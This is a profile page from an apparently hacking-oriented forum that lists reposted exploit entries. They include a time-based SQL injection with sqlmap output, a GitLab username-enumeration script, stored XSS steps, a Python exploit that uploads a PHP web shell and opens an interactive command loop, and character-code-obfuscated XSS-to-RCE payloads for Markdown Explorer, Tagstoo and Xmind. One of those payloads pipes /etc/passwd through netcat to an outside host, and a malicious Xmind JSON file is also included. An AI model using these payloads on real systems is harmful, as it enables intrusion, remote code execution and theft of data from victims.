Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection) # Date: 02/05/2021 # Exploit Author: Syed Sheeraz Ali # Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html # Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Windows 10 20H2 + XAMPP v3.2.4 If we try to login as a voter and catch the login request in burp then pass it to sql map then we can put our payload in voter parameter Vulnerable code ``` Path :- /votersystem/login.php <?php session_start(); include 'includes/conn.php'; if(isset($_POST['login'])){ $voter = $_POST['voter']; <- vulnerable parameter $password = $_POST['password']; $sql = "SELECT * FROM voters WHERE voters_id = '$voter'"; <- Passed unsanitized input $query = $conn->query($sql); if($query->num_rows < 1){ $_SESSION['error'] = 'Cannot find voter with the ID'; } else{ $row = $query->fetch_assoc(); if(password_verify($password, $row['password'])){ $_SESSION['voter'] = $row['id']; } else{ $_SESSION['error'] = 'Incorrect password'; } } } else{ $_SESSION['error'] = 'Input voter credentials first'; } header('location: index.php'); ?> ``` Request ``` POST /login.php HTTP/1.1 Host: 10.129.139.200 Content-Length: 27 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://10.129.139.200 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-GPC: 1 Referer: http://10.129.139.200/ Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: PHPSESSID=vuukl0gemht1iiq7lmptu7npoe Connection: close voter=as&password=as&login= ``` Sqlmap output ``` python3 sqlmap.py --dbms=mysql --batch --level=1 --risk=3 -r /Users/sheerazali/Documents/wpcve/voter.req -p voter ___ __H__ ___ ___[)]_____ ___ ___ {1.5.4.7#dev} |_ -| . [(] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 07:50:56 /2021-05-02/ [07:50:56] [INFO] parsing HTTP request from '/Users/sheerazali/Documents/wpcve/voter.req' [07:50:57] [INFO] testing connection to the target URL got a 302 redirect to 'http://10.129.139.200:80/index.php'. Do you want to follow? [Y/n] Y redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y sqlmap resumed the following injection point(s) from stored session: --- Parameter: voter (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: voter=as' AND (SELECT 2487 FROM (SELECT(SLEEP(5)))WYpt) AND 'hBVQ'='hBVQ&password=as&login= --- [07:50:57] [INFO] testing MySQL do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y [07:51:08] [INFO] confirming MySQL [07:51:08] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions [07:51:19] [INFO] adjusting time delay to 1 second due to good response times [07:51:19] [INFO] the back-end DBMS is MySQL web application technology: PHP 7.3.27, Apache 2.4.46 back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) [07:51:19] [INFO] fetched data logged to text files under '/Users/sheerazali/.local/share/sqlmap/output/10.129.139.200' [*] ending @ 07:51:19 /2021-05-02/ ```
  2. HireHackking

    GitLab Community Edition (CE) 13.10.3 - User Enumeration

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: GitLab Community Edition (CE) 13.10.3 - User Enumeration # Date: 4/29/2021 # Exploit Author: @4D0niiS [https://github.com/4D0niiS] # Vendor Homepage: https://gitlab.com/ # Version: 13.10.3 # Tested on: Kali Linux 2021.1 #!/bin/bash #Colors RED='\033[38;5;196m' GREEN='\e[38;5;47m' NC='\033[0m' BOLD='\e[1m' PINK='\e[38;5;198m' Italic='\e[3m' BBlue='\e[44m' YELLOW='\033[0;33m' clear echo -e "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" echo -e " ${BBlue}${BOLD}GitLab User Enumeration Script${NC}" echo -e " ${BOLD}Version 1.0${NC}\n" echo -e "${BOLD}${PINK}Description: ${NC}It prints out the usernames that exist in your victim's GitLab CE instance\n" echo -e "${BOLD}${PINK}Disclaimer: ${NC}${Italic}Do not run this script against ${BOLD}GitLab.com!${NC}${Italic} Also keep in mind that this PoC is meant only" echo -e "for educational purpose and ethical use. Running it against systems that you do not own or have the" echo -e "right permission is totally on your own risk.\n${NC}" echo -e "${BOLD}${PINK}Author:${NC}${BOLD} @4DoniiS${NC}${Italic} [https://github.com/4D0niiS]${NC}" echo -e "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" echo "" echo "" # Usage usage() { echo -e "${YELLOW}usage: ./gitlab_user_enum.sh --url <URL> --userlist <Username Wordlist>${NC}\n" echo -e "${Italic}PARAMETERS:${NC}" echo -e "-------------" echo -e "-u/--url The URL of your victim's GitLab instance" echo -e "--userlist Path to a username wordlist file (one per line)" echo -e "-h/--help Show this help message and exit" echo -e "\n" echo -e "${Italic}Example:${NC}" echo -e "-------------" echo -e "./gitlab_user_enum.sh --url http://gitlab.local/ --userlist /home/user/usernames.txt" } #check for params args=("$@") URL="" user_list="" for (( i=0; i < $#; i++)) { case ${args[$i]} in --url | -u) #GitLab's URL URL=${args[$((i+1))]} ;; --userlist) #Username wordlist user_list=${args[$((i+1))]} ;; -h | --help | "") #Help Menu usage exit 0 ;; esac } ## checking the mandatory parameter (URL) if [ -z "$URL" ] then usage echo "" echo -e "${RED}${BOLD}The URL of your GitLab target (--url) is missing. ${NC}" exit 0 fi # User Enumeration Function enumeration(){ while IFS= read -r line do echo "LOOP" HTTP_Code=$( curl -s -o /dev/null -w "%{http_code}" $URL/$line) echo $HTTP_Code #echo "\n" if [ $HTTP_Code -eq 200 ] then echo -e "${GREEN}${BOLD}[+]${NC} The username ${GREEN}${BOLD}$line ${NC}exists!" #check the connection elif [ $HTTP_Code -eq 000 ] then echo -e "${BOLD}${RED}[!]${NC} The target is unreachable. Please make sure that you entered target's URL correctly and you have connection with it!" exit 0 fi done < "$user_list" } # Main enumeration
  3. HireHackking

    Savsoft Quiz 5 - 'User Account Settings' Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Savsoft Quiz 5 - 'User Account Settings' Persistent Cross-Site Scripting # Date: 2021-05-04 # Exploit Author: strider # Software Link: https://github.com/savsofts/savsoftquiz_v5 # Vendor: https://savsoftquiz.com # Version: 5.0 # Tested on: Ubuntu 20.04 LTS / Kali Linux ====================================[Description]==================================== The vulnerability is found at the user settings page where the user can change his name and his login credentials. its possible to inject html/js into the fields which will be executed after pressing submit. ====================================[Proof of Concept]==================================== If you installed this software create a new user or you can use the default user shown in the install description test-link: http://192.168.1.109/index.php/user/edit_user/<userid> step1) login into an account step2) click on the top right on you account name and navigate to "My Account" step3) insert "><script>alert(document.cookie);</script> into the fields and hit submit boom!
  4. HireHackking

    GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration # Date: 4/29/2021 # Exploit Author: @4D0niiS [https://github.com/4D0niiS] # Vendor Homepage: https://gitlab.com/ # Version: 13.10.3 # Tested on: Kali Linux 2021.1 INFO: An unauthenticated attacker can remotely enumerate the existence of different usernames in her victim's GitLab CE instance by leveraging its sign_up page [Ex: http://gitlab.local/users/sgin_up]. DISCLAIMER: Do not test this method against GitLab.com. Also keep in mind that this PoC is meant only for educational purpose and ethical use. Testing it against systems that you do not own or have the right permission is totally on your own risk. STEPS: The required steps for this purpose are as follows: 1- fill in the "username" field on sign_up form with something and ensure it is validating the entered username 2- repeat step1 (with username: testuser) while you are intercepting the created request with a proxy tool like Burp Suite. You should see a request similar to the one bellow: ---------------------------------------------------------------------------------------------------------------------------------------------------------------- GET /users/testuser/exists HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/users/sign_up X-CSRF-Token: <some value> X-Requested-With: XMLHttpRequest Connection: close Cookie: experimentation_subject_id=<some value>; known_sign_in=<some value>; _gitlab_session=<some value> ---------------------------------------------------------------------------------------------------------------------------------------------------------------- * note that the tested username (testuser) is in URI 3- Send this request to Burp's intruder and run a brute force attack on it by replacing "testuser" in the URI as the enumeration parameter. 4- Valid usernames can be found by looking for the statement {"exists":true} in responses. On the other hand, invalid ones give {"exists":false} in responses. So you can find valid users by analyzing the responses. Take the following examples: -------------------------------------------The following response belongs to a valid user ------------------------------------------ HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Apr 2021 09:52:44 GMT Content-Type: application/json; charset=utf-8 Content-Length: 15 Connection: close Cache-Control: max-age=0, private, must-revalidate Etag: W/"8063e5a51719c58189c7d5209a5f37b3" Page-Title: GitLab Set-Cookie: _gitlab_session=<some value>; path=/; expires=Mon, 19 Apr 2021 11:52:44 GMT; HttpOnly X-Content-Type-Options: nosniff X-Download-Options: noopen X-Frame-Options: DENY X-Gitlab-Feature-Category: users X-Permitted-Cross-Domain-Policies: none X-Request-Id: 01F3MRQTB94MT0HQXE0NMEMP7F X-Runtime: 0.221557 X-Ua-Compatible: IE=edge X-Xss-Protection: 1; mode=block Strict-Transport-Security: max-age=31536000 Referrer-Policy: strict-origin-when-cross-origin {"exists":true} -------------------------------------------The following response belongs to an invalid user ------------------------------------------ HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Apr 2021 09:55:34 GMT Content-Type: application/json; charset=utf-8 Content-Length: 16 Connection: close Cache-Control: max-age=0, private, must-revalidate Etag: W/"e39f603a5ebcff23859d200f9c9dc20f" Page-Title: GitLab Set-Cookie: _gitlab_session=<some value>; path=/; expires=Mon, 19 Apr 2021 11:55:34 GMT; HttpOnly X-Content-Type-Options: nosniff X-Download-Options: noopen X-Frame-Options: DENY X-Gitlab-Feature-Category: users X-Permitted-Cross-Domain-Policies: none X-Request-Id: 01F3MRX0GJGG1DE8RPKPCVC7Q0 X-Runtime: 0.033046 X-Ua-Compatible: IE=edge X-Xss-Protection: 1; mode=block Strict-Transport-Security: max-age=31536000 Referrer-Policy: strict-origin-when-cross-origin {"exists":false}
  5. HireHackking

    Internship Portal Management System 1.0 - Remote Code Execution(Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated) # Date: 2021-05-04 # Exploit Author: argenestel # Vendor Homepage: https://www.sourcecodester.com/php/11712/internship-portal-management-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=11712&title=Internship+Portal+Management+System+using+PHP+with+Source+Code # Version: 1.0 # Tested on: Debian 10 import requests import time #change the url to the site running the vulnerable system url="http://127.0.0.1:4000" #burp proxy proxies = { "http": "http://127.0.0.1:8080", } #payload payload='<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>' #the upload point insert_url=url+"/inserty.php" def fill_details(): global payload global shellend global shellstart print("Online Intern System 1.0 Exploit: Unauth RCE via File Upload") #time start shellstart=int(time.time()) #print(shellstart) files = {'file':('shell.php',payload, 'image/png', {'Content-Disposition': 'form-data'} ) } data = { "company_name":"some", "first_name":"some", "last_name":"some", "email":"some@some.com", "gender":"Male", "insert_button":"Apply", "terms":"on" } r = requests.post(insert_url, data=data, files=files) if r.status_code == 200: print("Exploited Intern System Successfully...") shellend = int(time.time()) #print(shellend) shell() else: print("Exploit Failed") def shell(): for shellname in range(shellstart, shellend+1): shellstr=str(shellname) shell_url=url+"/upload/"+shellstr+"_shell.php" r = requests.get(shell_url) if r.status_code == 200: shell_url=url+"/upload/"+shellstr+"_shell.php" break r = requests.get(shell_url) if r.status_code == 200: print("Shell Starting...") while True: cmd=input("cmd$ ") r = requests.get(shell_url+"?cmd="+cmd) print(r.text) else: print("File Name Error") fill_details()
  6. HireHackking

    Markdown Explorer 0.1.1 - Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Markdown Explorer 0.1.1 - XSS to RCE # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://github.com/jersou/markdown-explorer # Version: 0.1.1 # Tested on: Windows, Linux, MacOs # Software Description: Easily explore, view and edit markdown documentation of a file tree. If your projects documentation is written in Markdown, with md files dispersed throughout your project tree, Markdown Explorer displays md files in a tree structure, and it allows filtering by file name or by file content. Just drop a folder on the window (or click on the folder icon on top left) to show the Markdown documentation of this folder. Then, explore the tree on the left, and toggle view/edit mode on md file with the button on the top right. # Vulnerability Description: The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the remote attacker to get remote execution on the computer. #Proof https://imgur.com/a/w4bcPWs # Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc) [<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>](http://)
  7. HireHackking

    Tagstoo 2.0.1 - Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Tagstoo 2.0.1 - Stored XSS to RCE # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://tagstoo.sourceforge.io/ # Version: v2.0.1 # Tested on: Windows, Linux, MacOs # Software Description: Software to tag folders and files, with multimedia and epubs preview. You can export data with the tagging information to a file, as backup or to import it in any computer. # Vulnerability Description: The software allows you to store payloads in the form of files or custom tags, once the malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the the remote attacker to get remote execution on the computer or directly open the folder in the program. # Proof video https://imgur.com/a/smeAjaW # Payload 1: exec(calc) #Decode Payload <script> var Process = process.binding('process_wrap').Process; var proc = new Process(); proc.onexit = function(a,b) {}; var env = process.env; var env_ = []; for (var key in env) env_.push(key+'='+env[key]); proc.spawn({file:'/usr/bin/gnome-calculator',cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]}); </script> #Encode Payload <img src=x onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))> # Payload 2: exec(netcat remote stolen file => /etc/passwd) #Decode Payload <audio src=x onerror="const exec= require('child_process').exec; exec('nc -w 3 192.168.111.129 1337 < /etc/passwd', (e, stdout, stderr)=> { if (e instanceof Error) { console.error(e); throw e; } console.log('stdout ', stdout); console.log('stderr ', stderr);}); alert('1')"> #Encode Payload <img src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62))>
  8. HireHackking

    Xmind 2020 - Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Xmind 2020 - XSS to RCE # Exploit Author: TaurusOmar # Date: May 4th, 2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://www.xmind.net/ # Version: 2020 # Tested on: Windows, Linux, MacOs # Software Description: XMind, a full-featured mind mapping and brainstorming tool, designed to generate ideas, inspire creativity, brings efficiency both in work and life. Millions and millions of WFH people love it. Many great products start with a small idea. Mind map can really be useful at the beginning of a project. Use it to record every idea in the meeting, you might be surprised by the difference and achievement it makes in the long run. # Vulnerability Description: The software allows you to store payloads in the form of files or as custom header titles, once the malicious code is entered, the payload will be executed when the victim moves the mouse or clicks. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the the remote attacker to get remote execution on the computer. #Proof video https://imgur.com/a/t96Nxo5 # Payload 2: exec(/etc/passwd) #Decode Payload <script> const { spawn } = require("child_process"); const cat = spawn("cat", ["/etc/passwd"]); cat.stdout.on("data", data => { alert(`stdout: ${data}`); });</script> #Encode Payload <img src=x onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,99,111,110,115,116,32,123,32,115,112,97,119,110,32,125,32,61,32,114,101,113,117,105,114,101,40,34,99,104,105,108,100,95,112,114,111,99,101,115,115,34,41,59,10,99,111,110,115,116,32,99,97,116,32,61,32,115,112,97,119,110,40,34,99,97,116,34,44,32,91,34,47,101,116,99,47,112,97,115,115,119,100,34,93,41,59,10,99,97,116,46,115,116,100,111,117,116,46,111,110,40,34,100,97,116,97,34,44,32,100,97,116,97,32,61,62,32,123,10,32,32,32,32,97,108,101,114,116,40,96,115,116,100,111,117,116,58,32,36,123,100,97,116,97,125,96,41,59,10,125,41,59,60,47,115,99,114,105,112,116,62))> # Payload 2: exec(calc) #Decode Payload <script> var Process = process.binding('process_wrap').Process; var proc = new Process(); proc.onexit = function(a,b) {}; var env = process.env; var env_ = []; for (var key in env) env_.push(key+'='+env[key]); proc.spawn({file:'/usr/bin/gnome-calculator',cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]}); </script> #Encode Payload <img src=x onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))> # File Malicious.json Payload [{"id":"5609f1388fd8c10e8f8798f104","class":"sheet","title":"Map 1","rootTopic":{"id":"b9aa22deba98b3b20c7ac8aca2","class":"topic","title":"\">'><img src=x onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,108,101,116,32,123,32,115,112,97,119,110,32,125,32,61,32,114,101,113,117,105,114,101,40,34,99,104,105,108,100,95,112,114,111,99,101,115,115,34,41,59,10,108,101,116,32,108,115,32,61,32,115,112,97,119,110,40,34,108,115,34,44,32,91,34,45,108,97,34,93,41,59,10,108,115,46,115,116,100,111,117,116,46,111,110,40,34,100,97,116,97,34,44,32,100,97,116,97,32,61,62,32,123,10,32,32,32,32,97,108,101,114,116,40,96,115,116,100,111,117,116,58,32,36,123,100,97,116,97,125,96,41,59,125,41,59,60,47,115,99,114,105,112,116,62,10,10))>","structureClass":"org.xmind.ui.map.unbalanced","children":{"attached":[{"id":"b58888b5ceebbf0e68dada0656","title":"Main Topic 1","titleUnedited":true},{"id":"193b56735e689ae86a01d91513","title":"Main Topic 2","titleUnedited":true},{"id":"67ddbcb1-85c9-4478-a0aa-580e9fdcd971","title":"Main Topic 3","titleUnedited":true}]},"extensions":[{"content":[{"content":"3","name":"right-number"}],"provider":"org.xmind.ui.map.unbalanced"}]},"theme":{"id":"c669ec6d4d48895260d968fc99","importantTopic":{"type":"topic","properties":{"fo:font-weight":"bold","fo:color":"#2b2b2b","svg:fill":"#FFDC34"}},"minorTopic":{"type":"topic","properties":{"fo:font-weight":"bold","fo:color":"#2b2b2b","svg:fill":"#AB9738"}},"expiredTopic":{"type":"topic","properties":{"fo:font-style":"italic","fo:text-decoration":" line-through"}},"centralTopic":{"type":"topic","styleId":"9a13b7d6-cd05-44c3-b903-6c3a50edc46e","properties":{"shape-class":"org.xmind.topicShape.roundedRect","svg:fill":"#1B1B1D","fo:font-family":"Montserrat","fo:font-weight":"600","fo:font-style":"normal","line-width":"3","line-color":"#292929","border-line-width":"0"}},"map":{"type":"map","styleId":"f0e1f9bb-a8f5-486a-a70a-b72b2b6560d3","properties":{"svg:fill":"#000000"}},"subTopic":{"type":"topic","styleId":"9ea90eed-1da0-4c93-bac4-2085e16a0faf","properties":{"fo:font-family":"Montserrat","svg:fill":"#636366","shape-class":"org.xmind.topicShape.roundedRect","fo:font-size":"14pt","fo:text-align":"left","border-line-width":"0","fo:color":"#FFFFFF"}},"mainTopic":{"type":"topic","styleId":"42065f7f-018c-4eb9-9dc7-3a7bbf464915","properties":{"fo:font-family":"Montserrat","svg:fill":"#3A3A3C","border-line-width":"0","fo:font-weight":"600","fo:font-style":"normal","fo:font-size":"18pt","fo:text-align":"left","fo:color":"#FFFFFF","line-width":"2"}},"summaryTopic":{"type":"topic","styleId":"c8f4c32b-2607-4fae-bb85-b8736039e941","properties":{"fo:font-family":"Montserrat","svg:fill":"#8E8E93","fo:font-weight":"500","fo:font-style":"normal","line-color":"#292929","border-line-width":"0"}},"calloutTopic":{"type":"topic","styleId":"6f8bd667-fb82-4d0d-899f-05dc76c5945e","properties":{"fo:font-family":"Montserrat","svg:fill":"#8E8E93","fo:font-size":"14pt","fo:font-weight":"500","fo:font-style":"normal"}},"floatingTopic":{"type":"topic","styleId":"c9509bc2-2641-4f5f-8b38-e62c14c907f9","properties":{"fo:font-family":"Montserrat","border-line-width":"0","fo:font-weight":"500","fo:font-style":"normal","line-width":"2","line-color":"#292929"}},"boundary":{"type":"boundary","styleId":"0d7cf959-3b54-4849-88e1-cc0fc8c60341","properties":{"svg:fill":"#545455","shape-class":"org.xmind.boundaryShape.roundedRect","line-color":"#5D5D60","fo:font-weight":"500","fo:font-style":"normal","fo:color":"#FFFFFF","fo:font-size":"13pt","fo:font-family":"Montserrat"}},"relationship":{"type":"relationship","styleId":"57da2f8e-3f8d-47ee-a802-93023fc802c1","properties":{"line-color":"#8E8E93","line-width":"2","fo:font-weight":"500","fo:font-style":"normal","fo:font-family":"Montserrat","fo:color":"#FFFFFF","fo:font-size":"13pt"}},"summary":{"type":"summary","styleId":"ddeb9d94-1678-4129-8796-42b036e08dd2","properties":{"line-color":"#5A5A5A"}}},"topicPositioning":"fixed"}]
  9. HireHackking

    Marky 0.0.1 - Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
